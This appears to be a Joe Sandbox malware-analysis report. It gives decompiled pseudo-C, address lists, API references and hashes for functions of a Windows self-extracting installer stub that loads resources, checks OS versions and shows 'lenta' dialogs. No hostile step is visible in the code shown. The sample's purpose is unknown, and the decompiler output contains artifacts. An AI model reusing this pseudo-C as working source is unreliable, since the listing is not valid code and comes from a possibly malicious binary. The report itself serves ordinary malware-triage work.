                            • Instruction Fuzzy Hash: B0315E36E14119AFCB14CFB8DD88EEEBBB5EB8A310F154569F805F3250DA346C059B60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 53%
                            			E00946298(intOrPtr __ecx, intOrPtr* __edx) {
                            				signed int _v8;
                            				char _v28;
                            				intOrPtr _v32;
                            				struct HINSTANCE__* _v36;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t16;
                            				struct HRSRC__* _t21;
                            				intOrPtr _t26;
                            				void* _t30;
                            				struct HINSTANCE__* _t36;
                            				intOrPtr* _t40;
                            				void* _t41;
                            				intOrPtr* _t44;
                            				intOrPtr* _t45;
                            				void* _t47;
                            				signed int _t50;
                            				struct HINSTANCE__* _t51;
                            
                            				_t44 = __edx;
                            				_t16 =  *0x948004; // 0xec518a5e
                            				_v8 = _t16 ^ _t50;
                            				_t46 = 0;
                            				_v32 = __ecx;
                            				_v36 = 0;
                            				_t36 = 1;
                            				E0094171E( &_v28, 0x14, "UPDFILE%lu", 0);
                            				while(1) {
                            					_t51 = _t51 + 0x10;
                            					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                            					if(_t21 == 0) {
                            						break;
                            					}
                            					_t45 = LockResource(LoadResource(_t46, _t21));
                            					if(_t45 == 0) {
                            						 *0x949124 = 0x80070714;
                            						_t36 = _t46;
                            					} else {
                            						_t5 = _t45 + 8; // 0x8
                            						_t44 = _t5;
                            						_t40 = _t44;
                            						_t6 = _t40 + 1; // 0x9
                            						_t47 = _t6;
                            						do {
                            							_t26 =  *_t40;
                            							_t40 = _t40 + 1;
                            						} while (_t26 != 0);
                            						_t41 = _t40 - _t47;
                            						_t46 = _t51;
                            						_t7 = _t41 + 1; // 0xa
                            						 *0x94a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                            						_t30 = _v32();
                            						if(_t51 != _t51) {
                            							asm("int 0x29");
                            						}
                            						_push(_t45);
                            						if(_t30 == 0) {
                            							_t36 = 0;
                            							FreeResource(??);
                            						} else {
                            							FreeResource();
                            							_v36 = _v36 + 1;
                            							E0094171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                            							_t46 = 0;
                            							continue;
                            						}
                            					}
                            					L12:
                            					return E00946CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                            				}
                            				goto L12;
                            			}






















                            0x00946298
                            0x009462a0
                            0x009462a7
                            0x009462ad
                            0x009462af
                            0x009462bb
                            0x009462c3
                            0x009462c4
                            0x0094633b
                            0x0094633b
                            0x00946345
                            0x0094634d
                            0x00000000
                            0x00000000
                            0x009462da
                            0x009462de
                            0x0094635f
                            0x00946369
                            0x009462e0
                            0x009462e0
                            0x009462e0
                            0x009462e3
                            0x009462e5
                            0x009462e5
                            0x009462e8
                            0x009462e8
                            0x009462ea
                            0x009462eb
                            0x009462ef
                            0x009462f1
                            0x009462f3
                            0x00946302
                            0x00946308
                            0x0094630d
                            0x00946314
                            0x00946314
                            0x00946316
                            0x00946319
                            0x00946355
                            0x00946357
                            0x0094631b
                            0x0094631b
                            0x00946331
                            0x00946334
                            0x00946339
                            0x00000000
                            0x00946339
                            0x00946319
                            0x0094636b
                            0x0094637d
                            0x0094637d
                            0x00000000

                            APIs
                              • Part of subcall function 0094171E: _vsnprintf.MSVCRT ref: 00941750
                            • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,009451CA,00000004,00000024,00942F71,?,00000002,00000000), ref: 009462CD
                            • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,009451CA,00000004,00000024,00942F71,?,00000002,00000000), ref: 009462D4
                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,009451CA,00000004,00000024,00942F71,?,00000002,00000000), ref: 0094631B
                            • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00946345
                            • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,009451CA,00000004,00000024,00942F71,?,00000002,00000000), ref: 00946357
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Resource$Free$FindLoadLock_vsnprintf
                            • String ID: UPDFILE%lu
                            • API String ID: 2922116661-2329316264
                            • Opcode ID: 1ad17ca81bc93f7e8b6c1787c1d2d6ef9f38867e351a4a5b43bef30323ec08e9
                            • Instruction ID: ad5ec5cda6ca4a11c2d33607ad7edf76dde155f34eae66668d0c2876ae7ba1f3
                            • Opcode Fuzzy Hash: 1ad17ca81bc93f7e8b6c1787c1d2d6ef9f38867e351a4a5b43bef30323ec08e9
                            • Instruction Fuzzy Hash: 7221F3B5A04219ABDB149F64DC45DFFBB7CEB8A714B000119F902A3241DB759D029BE2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E0094681F(void* __ebx) {
                            				signed int _v8;
                            				char _v20;
                            				struct _OSVERSIONINFOA _v168;
                            				void* _v172;
                            				int* _v176;
                            				int _v180;
                            				int _v184;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t19;
                            				long _t31;
                            				signed int _t35;
                            				void* _t36;
                            				intOrPtr _t41;
                            				signed int _t44;
                            
                            				_t36 = __ebx;
                            				_t19 =  *0x948004; // 0xec518a5e
                            				_v8 = _t19 ^ _t44;
                            				_t41 =  *0x9481d8; // 0xfffffffe
                            				_t43 = 0;
                            				_v180 = 0xc;
                            				_v176 = 0;
                            				if(_t41 == 0xfffffffe) {
                            					 *0x9481d8 = 0;
                            					_v168.dwOSVersionInfoSize = 0x94;
                            					if(GetVersionExA( &_v168) == 0) {
                            						L12:
                            						_t41 =  *0x9481d8; // 0xfffffffe
                            					} else {
                            						_t41 = 1;
                            						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                            							goto L12;
                            						} else {
                            							_t31 = RegQueryValueExA(_v172, 0x941140, 0,  &_v184,  &_v20,  &_v180);
                            							_t43 = _t31;
                            							RegCloseKey(_v172);
                            							if(_t31 != 0) {
                            								goto L12;
                            							} else {
                            								_t40 =  &_v176;
                            								if(E009466F9( &_v20,  &_v176) == 0) {
                            									goto L12;
                            								} else {
                            									_t35 = _v176 & 0x000003ff;
                            									if(_t35 == 1 || _t35 == 0xd) {
                            										 *0x9481d8 = _t41;
                            									} else {
                            										goto L12;
                            									}
                            								}
                            							}
                            						}
                            					}
                            				}
                            				return E00946CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                            			}


















                            0x0094681f
                            0x0094682a
                            0x00946831
                            0x00946836
                            0x0094683c
                            0x0094683e
                            0x00946848
                            0x00946851
                            0x0094685d
                            0x00946864
                            0x00946876
                            0x0094693a
                            0x0094693a
                            0x0094687c
                            0x0094687e
                            0x00946885
                            0x00000000
                            0x009468d6
                            0x009468f4
                            0x00946900
                            0x00946902
                            0x0094690a
                            0x00000000
                            0x0094690c
                            0x0094690c
                            0x0094691c
                            0x00000000
                            0x0094691e
                            0x00946924
                            0x0094692b
                            0x00946932
                            0x00000000
                            0x00000000
                            0x00000000
                            0x0094692b
                            0x0094691c
                            0x0094690a
                            0x00946885
                            0x00946876
                            0x00946951

                            APIs
                            • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 0094686E
                            • GetSystemMetrics.USER32(0000004A), ref: 009468A7
                            • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 009468CC
                            • RegQueryValueExA.ADVAPI32(?,00941140,00000000,?,?,0000000C), ref: 009468F4
                            • RegCloseKey.ADVAPI32(?), ref: 00946902
                              • Part of subcall function 009466F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,0094691A), ref: 00946741
                            Strings
                            • Control Panel\Desktop\ResourceLocale, xrefs: 009468C2
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                            • String ID: Control Panel\Desktop\ResourceLocale
                            • API String ID: 3346862599-1109908249
                            • Opcode ID: 81ab26e1fff0e09a8abc84f340bf395faaca5c50382cffccae0bb25f1b208fc1
                            • Instruction ID: a5e5875b48d10d39bb427f4ea5550f7a1af5662e379b4c969c8960a5ac9358a1
                            • Opcode Fuzzy Hash: 81ab26e1fff0e09a8abc84f340bf395faaca5c50382cffccae0bb25f1b208fc1
                            • Instruction Fuzzy Hash: 33318EB5A142189FDB318F11DC44FAAB7B8EB4B728F0001A9E949A2140DBB09E859F53
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00943A3F(void* __eflags) {
                            				void* _t3;
                            				void* _t9;
                            				CHAR* _t16;
                            
                            				_t16 = "LICENSE";
                            				_t1 = E0094468F(_t16, 0, 0) + 1; // 0x1
                            				_t3 = LocalAlloc(0x40, _t1);
                            				 *0x948d4c = _t3;
                            				if(_t3 != 0) {
                            					_t19 = _t16;
                            					if(E0094468F(_t16, _t3, _t28) != 0) {
                            						if(lstrcmpA( *0x948d4c, "<None>") == 0) {
                            							LocalFree( *0x948d4c);
                            							L9:
                            							 *0x949124 = 0;
                            							return 1;
                            						}
                            						_t9 = E00946517(_t19, 0x7d1, 0, E00943100, 0, 0);
                            						LocalFree( *0x948d4c);
                            						if(_t9 != 0) {
                            							goto L9;
                            						}
                            						 *0x949124 = 0x800704c7;
                            						L2:
                            						return 0;
                            					}
                            					E009444B9(0, 0x4b1, 0, 0, 0x10, 0);
                            					LocalFree( *0x948d4c);
                            					 *0x949124 = 0x80070714;
                            					goto L2;
                            				}
                            				E009444B9(0, 0x4b5, 0, 0, 0x10, 0);
                            				 *0x949124 = E00946285();
                            				goto L2;
                            			}






                            0x00943a46
                            0x00943a57
                            0x00943a5d
                            0x00943a63
                            0x00943a6a
                            0x00943a91
                            0x00943a9a
                            0x00943ad8
                            0x00943b13
                            0x00943b19
                            0x00943b1b
                            0x00000000
                            0x00943b21
                            0x00943ae7
                            0x00943af4
                            0x00943afc
                            0x00000000
                            0x00000000
                            0x00943afe
                            0x00943a87
                            0x00000000
                            0x00943a87
                            0x00943aa8
                            0x00943ab3
                            0x00943ab9
                            0x00000000
                            0x00943ab9
                            0x00943a78
                            0x00943a82
                            0x00000000

                            APIs
                              • Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446A0
                              • Part of subcall function 0094468F: SizeofResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446A9
                              • Part of subcall function 0094468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009446C3
                              • Part of subcall function 0094468F: LoadResource.KERNEL32(00000000,00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446CC
                              • Part of subcall function 0094468F: LockResource.KERNEL32(00000000,?,00942D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009446D3
                              • Part of subcall function 0094468F: memcpy_s.MSVCRT ref: 009446E5
                              • Part of subcall function 0094468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009446EF
                            • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00942F64,?,00000002,00000000), ref: 00943A5D
                            • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00943AB3
                              • Part of subcall function 009444B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00944518
                              • Part of subcall function 009444B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00944554
                              • Part of subcall function 00946285: GetLastError.KERNEL32(00945BBC), ref: 00946285
                            • lstrcmpA.KERNEL32(<None>,00000000), ref: 00943AD0
                            • LocalFree.KERNEL32 ref: 00943B13
                              • Part of subcall function 00946517: FindResourceA.KERNEL32(00940000,000007D6,00000005), ref: 0094652A
                              • Part of subcall function 00946517: LoadResource.KERNEL32(00940000,00000000,?,?,00942EE8,00000000,009419E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00946538
                              • Part of subcall function 00946517: DialogBoxIndirectParamA.USER32(00940000,00000000,00000547,009419E0,00000000), ref: 00946557
                              • Part of subcall function 00946517: FreeResource.KERNEL32(00000000,?,?,00942EE8,00000000,009419E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00946560
                            • LocalFree.KERNEL32(00000000,00943100,00000000,00000000), ref: 00943AF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                            • String ID: <None>$LICENSE
                            • API String ID: 2414642746-383193767
                            • Opcode ID: 22d5e1b173fc09f352c58d6c4a56abba750bbbc620643870bc2f34bcb631457c
                            • Instruction ID: b4c00d86d52308cd66d4f69765548daf51902b2be527689bc8c9d98f2047076b
                            • Opcode Fuzzy Hash: 22d5e1b173fc09f352c58d6c4a56abba750bbbc620643870bc2f34bcb631457c
                            • Instruction Fuzzy Hash: 4311EC787592016BD7345F329C09F1B3AFDDBDBB04B10862EF541E55E1DA798800A621
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 94%
                            			E009424E0(void* __ebx) {
                            				signed int _v8;
                            				char _v268;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t7;
                            				void* _t20;
                            				long _t26;
                            				signed int _t27;
                            
                            				_t20 = __ebx;
                            				_t7 =  *0x948004; // 0xec518a5e
                            				_v8 = _t7 ^ _t27;
                            				_t25 = 0x104;
                            				_t26 = 0;
                            				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                            					E0094658A( &_v268, 0x104, "wininit.ini");
                            					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                            					_t25 = _lopen( &_v268, 0x40);
                            					if(_t25 != 0xffffffff) {
                            						_t26 = _llseek(_t25, 0, 2);
                            						_lclose(_t25);
                            					}
                            				}
                            				return E00946CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                            			}











                            0x009424e0
                            0x009424eb
                            0x009424f2
                            0x009424f7
                            0x00942504
                            0x0094250e
                            0x0094251d
                            0x0094252c
                            0x00942541
                            0x00942546
                            0x00942553
                            0x00942555
                            0x00942555
                            0x00942546
                            0x0094256c

                            APIs
                            • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00942506
                            • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0094252C
                            • _lopen.KERNEL32 ref: 0094253B
                            • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0094254C
                            • _lclose.KERNEL32(00000000), ref: 00942555
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.315389196.0000000000941000.00000020.00000001.01000000.00000004.sdmp, Offset: 00940000, based on PE: true
                            • Associated: 00000001.00000002.315383961.0000000000940000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315400088.0000000000948000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094A000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000001.00000002.315411950.000000000094C000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_940000_bfCg.jbxd
                            Similarity
                            • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                            • String ID: wininit.ini
                            • API String ID: 3273605193-4206010578
                            • Opcode ID: 72e7b8ee66e101ca16d2e8c2412a9662dd518ce573d092d57cf4644ea4460238
                            • Instruction ID: 1c8cf1d3924557de0a10f27121a5cabbd4e2b88f4e781b56c792b1b3c21c3e83
                            • Opcode Fuzzy Hash: 72e7b8ee66e101ca16d2e8c2412a9662dd518ce573d092d57cf4644ea4460238
                            • Instruction Fuzzy Hash: 2001B136614118ABD7209B65DC0CEDFBB7CEB87760F000155FA49D3190DE748E85CAA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 75%
                            			E009436EE(CHAR* __ecx) {
                            				signed int _v8;
                            				char _v268;
                            				struct _OSVERSIONINFOA _v416;
                            				signed int _v420;
                            				signed int _v424;
                            				CHAR* _v428;
                            				CHAR* _v432;
                            				signed int _v436;
                            				CHAR* _v440;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				signed int _t72;
                            				CHAR* _t77;
                            				CHAR* _t91;
                            				CHAR* _t94;
                            				int _t97;
                            				CHAR* _t98;
                            				signed char _t99;
                            				CHAR* _t104;
                            				signed short _t107;
                            				signed int _t109;
                            				short _t113;
                            				void* _t114;
                            				signed char _t115;
                            				short _t119;
                            				CHAR* _t123;
                            				CHAR* _t124;
                            				CHAR* _t129;
                            				signed int _t131;
                            				signed int _t132;
                            				CHAR* _t135;
                            				CHAR* _t138;
                            				signed int _t139;
                            
                            				_t72 =  *0x948004; // 0xec518a5e
                            				_v8 = _t72 ^ _t139;
                            				_v416.dwOSVersionInfoSize = 0x94;
                            				_t115 = __ecx;
                            				_t135 = 0;
                            				_v432 = __ecx;
                            				_t138 = 0;
                            				if(GetVersionExA( &_v416) != 0) {
                            					_t133 = _v416.dwMajorVersion;
                            					_t119 = 2;
                            					_t77 = _v416.dwPlatformId - 1;
                            					__eflags = _t77;
                            					if(_t77 == 0) {
                            						_t119 = 0;
                            						__eflags = 1;
                            						 *0x948184 = 1;
                            						 *0x948180 = 1;
                            						L13:
                            						 *0x949a40 = _t119;
                            						L14:
                            						__eflags =  *0x948a34 - _t138; // 0x0
                            						if(__eflags != 0) {
                            							goto L66;
                            						}
                            						__eflags = _t115;
                            						if(_t115 == 0) {
                            							goto L66;
                            						}
                            						_v428 = _t135;
                            						__eflags = _t119;
                            						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                            						_t11 =  &_v420;
                            						 *_t11 = _v420 & _t138;
                            						__eflags =  *_t11;
                            						_v440 = _t115;
                            						do {
                            							_v424 = _t135 * 0x18;
                            							_v436 = E00942A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                            							_t91 = E00942A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                            							_t123 = _v436;
                            							_t133 = 0x54d;
                            							__eflags = _t123;
                            							if(_t123 < 0) {
                            								L32:
                            								__eflags = _v420 - 1;
                            								if(_v420 == 1) {
                            									_t138 = 0x54c;
                            									L36:
                            									__eflags = _t138;
                            									if(_t138 != 0) {
                            										L40:
                            										__eflags = _t138 - _t133;
                            										if(_t138 == _t133) {
                            											L30:
                            											_v420 = _v420 & 0x00000000;
                            											_t115 = 0;
                            											_v436 = _v436 & 0x00000000;
                            											__eflags = _t138 - _t133;
                            											_t133 = _v432;
                            											if(__eflags != 0) {
                            												_t124 = _v440;
                            											} else {
                            												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                            												_v420 =  &_v268;
                            											}
                            											__eflags = _t124;
                            											if(_t124 == 0) {
                            												_t135 = _v436;
                            											} else {
                            												_t99 = _t124[0x30];
                            												_t135 = _t124[0x34] + 0x84 + _t133;
                            												__eflags = _t99 & 0x00000001;
                            												if((_t99 & 0x00000001) == 0) {
                            													asm("sbb ebx, ebx");
                            													_t115 =  ~(_t99 & 2) & 0x00000101;
                            												} else {
                            													_t115 = 0x104;
                            												}
                            											}
                            											__eflags =  *0x948a38 & 0x00000001;
                            											if(( *0x948a38 & 0x00000001) != 0) {
                            												L64:
                            												_push(0);
                            												_push(0x30);
                            												_push(_v420);
                            												_push("lenta");
                            												goto L65;
                            											} else {
                            												__eflags = _t135;
                            												if(_t135 == 0) {
                            													goto L64;
                            												}
                            												__eflags =  *_t135;
                            												if( *_t135 == 0) {
                            													goto L64;
                            												}
                            												MessageBeep(0);
                            												_t94 = E0094681F(_t115);
                            												__eflags = _t94;
                            												if(_t94 == 0) {
                            													L57:
                            													0x180030 = 0x30;
                            													L58:
                            													_t97 = MessageBoxA(0, _t135, "lenta", 0x00180030 | _t115);
                            													__eflags = _t115 & 0x00000004;
                            													if((_t115 & 0x00000004) == 0) {
                            														__eflags = _t115 & 0x00000001;
                            														if((_t115 & 0x00000001) == 0) {
                            															goto L66;
                            														}
                            														__eflags = _t97 - 1;
                            														L62:
                            														if(__eflags == 0) {
                            															_t138 = 0;
                            														}
                            														goto L66;
                            													}
                            													__eflags = _t97 - 6;
                            													goto L62;
                            												}
                            												_t98 = E009467C9(_t124, _t124);
                            												__eflags = _t98;
                            												if(_t98 == 0) {
                            													goto L57;
                            												}
                            												goto L58;
                            											}
                            										}
                            										__eflags = _t138 - 0x54c;
                            										if(_t138 == 0x54c) {
                            											goto L30;
                            										}
                            										__eflags = _t138;
                            										if(_t138 == 0) {
                            											goto L66;
                            										}
                            										_t135 = 0;
                            										__eflags = 0;
                            										goto L44;
                            									}
                            									L37:
                            									_t129 = _v432;
                            									__eflags = _t129[0x7c];
                            									if(_t129[0x7c] == 0) {
                            										goto L66;
                            									}
                            									_t133 =  &_v268;
                            									_t104 = E009428E8(_t129,  &_v268, _t129,  &_v428);
                            									__eflags = _t104;
                            									if(_t104 != 0) {
                            										goto L66;
                            									}
                            									_t135 = _v428;
                            									_t133 = 0x54d;
                            									_t138 = 0x54d;
                            									goto L40;
                            								}
                            								goto L33;
                            							}
                            							__eflags = _t91;
                            							if(_t91 > 0) {
                            								goto L32;
                            							}
                            							__eflags = _t123;
                            							if(_t123 != 0) {
                            								__eflags = _t91;
                            								if(_t91 != 0) {
                            									goto L37;
                            								}
                            								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                            								L27:
                            								if(__eflags <= 0) {
                            									goto L37;
                            								}
                            								L28:
                            								__eflags = _t135;
                            								if(_t135 == 0) {
                            									goto L33;
                            								}
                            								_t138 = 0x54c;
                            								goto L30;
                            							}
                            							__eflags = _t91;
                            							_t107 = _v416.dwBuildNumber;
                            							if(_t91 != 0) {
                            								_t131 = _v424;
                            								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                            								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                            									goto L37;
                            								}
                            								goto L28;
                            							}
                            							_t132 = _t107 & 0x0000ffff;
                            							_t109 = _v424;
                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                            							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                            								goto L28;
                            							}
                            							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                            							goto L27;
                            							L33:
                            							_t135 =  &(_t135[1]);
                            							_v428 = _t135;
                            							_v420 = _t135;
                            							__eflags = _t135 - 2;
                            						} while (_t135 < 2);
                            						goto L36;
                            					}
                            					__eflags = _t77 == 1;
                            					if(_t77 == 1) {
                            						 *0x949a40 = _t119;
                            						 *0x948184 = 1;
                            						 *0x948180 = 1;
                            						__eflags = _t133 - 3;
                            						if(_t133 > 3) {
                            							__eflags = _t133 - 5;
                            							if(_t133 < 5) {
                            								goto L14;
                            							}
                            							_t113 = 3;
                            							_t119 = _t113;
                            							goto L13;
                            						}
                            						_t119 = 1;
                            						_t114 = 3;
                            						 *0x949a40 = 1;
                            						__eflags = _t133 - _t114;
                            						if(__eflags < 0) {
                            							L9:
                            							 *0x948184 = _t135;
                            							 *0x948180 = _t135;
                            							goto L14;
                            						}
                            						if(__eflags != 0) {
                            							goto L14;
                            						}
                            						__eflags = _v416.dwMinorVersion - 0x33;
                            						if(_v416.dwMinorVersion >= 0x33) {
                            							goto L14;
                            						}
                            						goto L9;
                            					}
                            					_t138 = 0x4ca;
                            					goto L44;
                            				} else {
                            					_t138 = 0x4b4;
                            					L44:
                            					_push(_t135);
                            					_push(0x10);
                            					_push(_t135);
                            					_push(_t135);
                            					L65:
                            					_t133 = _t138;
                            					E009444B9(0, _t138);
                            					L66:
                            					return E00946CE0(0 | _t138 == 0x00000000, _t115, _v8 ^ _t139, _t133, _t135, _t138);
                            				}
                            			}





































                            0x009436f9
                            0x00943700
                            0x0094370c
                            0x00943716
                            0x00943718
                            0x0094371b
                            0x00943721
                            0x0094372b
                            0x0094373d
                            0x00943745
                            0x00943746
                            0x00943746
                            0x00943749
                            0x009437ab
                            0x009437ad
                            0x009437ae
                            0x009437b3
                            0x009437b8
                            0x009437b8
                            0x009437bf
                            0x009437bf
                            0x009437c5
                            0x00000000
                            0x00000000
                            0x009437cb
                            0x009437cd
                            0x00000000
                            0x00000000
                            0x009437d5
                            0x009437db
                            0x009437e8
                            0x009437ea
                            0x009437ea
                            0x009437ea
                            0x009437f0
                            0x009437f6
                            0x00943805
                            0x00943817
                            0x0094382b
                            0x00943830
                            0x00943836
                            0x0094383b
                            0x0094383d
                            0x009438eb
                            0x009438eb
                            0x009438f2
                            0x0094390c
                            0x00943911
                            0x00943911
                            0x00943913
                            0x0094394d
                            0x0094394d
                            0x0094394f
                            0x009438a9
                            0x009438a9
                            0x009438b0
                            0x009438b2
                            0x009438b9
                            0x009438bb
                            0x009438c1
                            0x00943975
                            0x009438c7
                            0x009438de
                            0x009438e0
                            0x009438e0
                            0x0094397b
                            0x0094397d
                            0x009439a9
                            0x0094397f
                            0x00943982
                            0x0094398b
                            0x0094398d
                            0x0094398f
                            0x0094399f
                            0x009439a1
                            0x00943991
                            0x00943991
                            0x00943991
                            0x0094398f
                            0x009439af
                            0x009439b6
                            0x00943a0f
                            0x00943a0f
                            0x00943a11
                            0x00943a13
                            0x00943a19
                            0x00000000
                            0x009439b8
                            0x009439b8
                            0x009439ba
                            0x00000000
                            0x00000000
                            0x009439bc
                            0x009439bf
                            0x00000000
                            0x00000000
                            0x009439c3
                            0x009439c9
                            0x009439ce
                            0x009439d0
                            0x009439e3
                            0x009439e5
                            0x009439e6
                            0x009439f1
                            0x009439f7
                            0x009439fa
                            0x00943a01
                            0x00943a04
                            0x00000000
                            0x00000000
                            0x00943a06
                            0x00943a09
                            0x00943a09
                            0x00943a0b
                            0x00943a0b
                            0x00000000
                            0x00943a09
                            0x009439fc
                            0x00000000
                            0x009439fc
                            0x009439d3
                            0x009439d8
                            0x009439da
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009439dc
                            0x009439b6
                            0x00943955
                            0x0094395b
                            0x00000000
                            0x00000000
                            0x00943961
                            0x00943963
                            0x00000000
                            0x00000000
                            0x00943969
                            0x00943969
                            0x00000000
                            0x00943969
                            0x00943915
                            0x00943915
                            0x0094391b
                            0x0094391f
                            0x00000000
                            0x00000000
                            0x0094392d
                            0x00943933
                            0x00943938
                            0x0094393a
                            0x00000000
                            0x00000000
                            0x00943940
                            0x00943946
                            0x0094394b
                            0x00000000
                            0x0094394b
                            0x00000000
                            0x009438f2
                            0x00943843
                            0x00943845
                            0x00000000
                            0x00000000
                            0x0094384b
                            0x0094384d
                            0x00943883
                            0x00943885
                            0x00000000
                            0x00000000
                            0x0094389a
                            0x0094389e
                            0x0094389e
                            0x00000000
                            0x00000000
                            0x009438a0
                            0x009438a0
                            0x009438a2
                            0x00000000
                            0x00000000
                            0x009438a4
                            0x00000000
                            0x009438a4
                            0x0094384f
                            0x00943851
                            0x00943857
                            0x0094386e
                            0x00943877
                            0x0094387b
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00943881
                            0x00943859
                            0x0094385c
                            0x00943862
                            0x00943866
                            0x00000000
                            0x00000000
                            0x00943868
                            0x00000000
                            0x009438f4
                            0x009438f4
